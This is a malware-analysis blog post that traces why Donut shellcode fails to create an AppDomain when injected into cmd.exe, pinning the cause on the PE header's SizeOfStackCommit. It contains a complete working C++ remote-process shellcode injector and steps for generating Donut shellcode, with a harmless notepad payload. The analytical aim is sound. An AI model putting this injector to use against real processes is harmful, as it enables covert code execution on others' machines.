Malware Analysis Series 1 — Will Donut’s generated shellcode ever fail?
Introduction
In a recent malware that we had analysed, the malware unpacked donut’s[1] shellcode and inject it into an existing running process. During the analysis, we did not have a copy of the running process as the running process exists only on the target machine. To continue with our analysis, we simply renamed cmd.exe to the injected process name and execute it for the malware to inject. However, the donut shellcode failed to execute the embedded C# assembly. In this article, we will be documenting our journey in understanding why it failed and how a particular field in the PE header “SizeOfStackCommit” can affect the injection of any C# payload to unmanaged process.
Our “Malware”
Due to “confidentiality reasons”, we will be writing a shellcode injection program to mimic the malware behaviour to inject any shellcode into another process.
#include "stdio.h"
#include "Windows.h"
int main(int argc, char* argv[], char* envp[])
{
if (argc != 3) {
printf("Insufficient input\nEnter in the following format:\n\t%s <PID> <Shellcode Path>", argv[0]);
TerminateProcess(GetCurrentProcess(), 2);
}
HANDLE remote_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, atoi(argv[1]));
if (remote_handle == INVALID_HANDLE_VALUE) {
printf("Invalid PID supplied or insufficient privilege\n");
TerminateProcess(GetCurrentProcess(), 1);
}
HANDLE file_handle = CreateFileA(argv[2], GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (file_handle == INVALID_HANDLE_VALUE) {
printf("No such file or invalid path\n");
TerminateProcess(GetCurrentProcess(), 3);
}
LARGE_INTEGER struct_filesize;
GetFileSizeEx(file_handle, &struct_filesize);
unsigned filesize = struct_filesize.QuadPart;
void* filecontent = malloc(filesize);
unsigned long fileBytesRead;
ReadFile(file_handle, filecontent, filesize, &fileBytesRead, NULL);
if (fileBytesRead != filesize) {
printf("Did not read the whole file or error in reading file\n");
printf("Filesize is %d and bytes read is %d", filesize, fileBytesRead);
TerminateProcess(GetCurrentProcess(), 4);
}
printf("Shellcode filesize (handle %d) is %d bytes\n",file_handle ,filesize);
void* remote_addr = VirtualAllocEx(remote_handle, NULL, filesize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (remote_addr == NULL) {
printf("Unable to write full shellcode into remote process");
TerminateProcess(GetCurrentProcess(), 6);
}
else {
printf("Allocated address is %p\n", remote_addr);
}
unsigned long long remoteBytesWritten;
WriteProcessMemory(remote_handle, remote_addr, filecontent, fileBytesRead, &remoteBytesWritten);
printf("Written %d bytes to %x in remote process\n", remoteBytesWritten, remote_addr);
if (remoteBytesWritten != fileBytesRead) {
printf("Unable to write full shellcode into remote process");
TerminateProcess(GetCurrentProcess(), 5);
}
HANDLE remote_thread = CreateRemoteThreadEx(remote_handle, NULL, NULL, (LPTHREAD_START_ROUTINE) remote_addr, NULL, 0, NULL, NULL);
printf("Remote thread started with handle %d", remote_thread);
}
C# payload and Donut shellcode
For demonstration purposes, our C# payload is responsible to launch a notepad when the assembly is successfully executed in .net environment.
using System.Diagnostics;
using System.Threading;
namespace SimpleAppLauncher
{
class Program
{
static void Main(string[] args)
{
Process.Start("notepad.exe");
while(true) { Thread.sleep(1000000); }
}
}
}
To generate a Donut shellcode, we can download the compiled donut.exe from the github repository [1] and execute donut.exe -i <PATH to compiled C# executable> to generate a loader.bin.
Injection outcome
In this post, we will be demonstrating injecting the donut shellcode in two different processes:
- taskmgr.exe
- cmd.exe
The donut shellcode successfully setup the .net environment for the C# assembly to execute, creating a new child process notepad.exe. However, this was not the case for injection into cmd.exe. In the malware output, we saw that the injection was successful but the shellcode did not execute successfully. Therefore, we are on the journey to find out why it failed to execute in a different process.
Debugging the shellcode
In order to find out what’s happening, we will first attach windbg to cmd.exe before executing our ShellcodeInjector to suspend the cmd.exe process.
Next, we will inject our donut shellcode into the cmd.exe process and take note of the address allocated. Once we know the address of the memory allocated for the shellcode, we can proceed to set a breakpoint on access on the memory allocated.
Since Donut is an open source project, through reverse engineering, we are able to pinpoint that the function CreateDomain failed. This eventually caused the donut shellcode to exit prematurely (https://github.com/TheWover/donut/blob/master/loader/inmem_dotnet.c#L113C1-L113C45). Based on MSDN documentation, there are two exception that will be thrown for the function. However, we are 100% sure that our provided argument is not NULL and the platform we are testing on is definitely supported.
Therefore we have to dive deeper using windbg to determine what is the exact exception that was thrown. Using the SOS Debugging Extension, the !pe method revealed that it is a OutofMemoryException which is strange. From here onwards, we have to look into the CreateDomain function to determine why it triggered this exception for cmd.exe but not taskmgr.exe.
Tracing the exception
System.AppDomain.CreateDomain
|__ System.AppDomain.InternalCreateDomain
|__ System.ApDomain.InternalCreateDomain
|__ AppDomainNative::CreateDomain
|__ AppDomainNative::CreateDomainHelper
|__ AppDomain::CreateUnamangedObject
|__ AppDomain::CreateAdUnloadWorker <-- Throw OutofMemoryException
In our attempt to trace the exception, we found that CreateAdUnloadWorker is throwing an OutofMemoryException. CreateAdUnloadWorker was called to create a worker thread to handle AppDomain unloads [3]. To connect the dots, CreateAdUnloadWorker will call clr!Thread::CreateNewThread which failed and hence it threw the OutofMemoryException.
AppDomain::CreateAdUnloadWorker
|__clr!SetupUnstartedThread
|__clr!Thread::CreateNewThread <-- Failed to create new thread
|__clr!RevertIfImpersonated
|__clr!Thread::CreateNewOSThread [4] <-- Failed to create OS thread
|__clr!Thread::CheckThreadStackSize [5]
|__clr!Thread::GetProcessDefaultStackSize
|__clr!ThreadWillCreateGuardPage [6] <-- Returns false causing the failure to create OS thread
Tracing into the calls of CreateNewThread, it will ultimately reach a function ThreadWillCreateGuardPage which returns false. This will cause the entire thread creation process to fail leading to the failure of creation of an AppDomain.
Root Cause
The snippet of code for ThreadWillCreateGuardPage (obtained from [6]) is shown below:
BOOL ThreadWillCreateGuardPage(SIZE_T sizeReservedStack, SIZE_T sizeCommittedStack)
{
SYSTEM_INFO sysInfo;
::GetSystemInfo(&sysInfo);
return (sizeReservedStack > sizeCommittedStack + ((size_t)sysInfo.dwPageSize));
} // ThreadWillCreateGuardPage
In order for the function to return false, the sizeReservedStack (1st parameter) must be less than sizeCommittedStack(2nd parameter). In this scenario, sizeReservedStack (1st parameter) is always 0x80000 as it was hardcoded as the second parameter passed to CreateNewOSThread and sizeCommittedStack is populated by clr!Thread::GetProcessDefaultStackSize function.
In the case for cmd.exe injection, the sizeCommittedStack is observed to be 0xFC000 on the debugger. If we look at the PE header of cmd.exe, the value seen in the debugger matches the SizeOfStackCommit in the PE header.
This is further confirmed when we debug the shellcode in taskmgr.exe where we see 0x2000 as the second parameter passed to clr!ThreadWillCreateGuardPage. As the value of SizeOfStackCommit for taskmgr.exe is much smaller, the thread is able to create guard page and thus create an AppDomain for the C# assembly.
Conclusion
This OutofMemoryException applies to all kind of shellcode that attempt to create an AppDomain on executables with large SizeOfStackCommit. As the MSDN did not document this exception, we hope this will help anyone out there who may be wondering why AppDomain creation will fail even though the platform is definitely supported and that a string is passed to the function.
Reference
[1] https://github.com/TheWover/donut
[2] https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.createdomain?view=net-7.0
[4] https://github.com/dotnet/runtime/blob/main/src/coreclr/vm/threads.cpp#L2261
[5] https://github.com/dotnet/runtime/blob/main/src/coreclr/vm/threads.cpp#L2184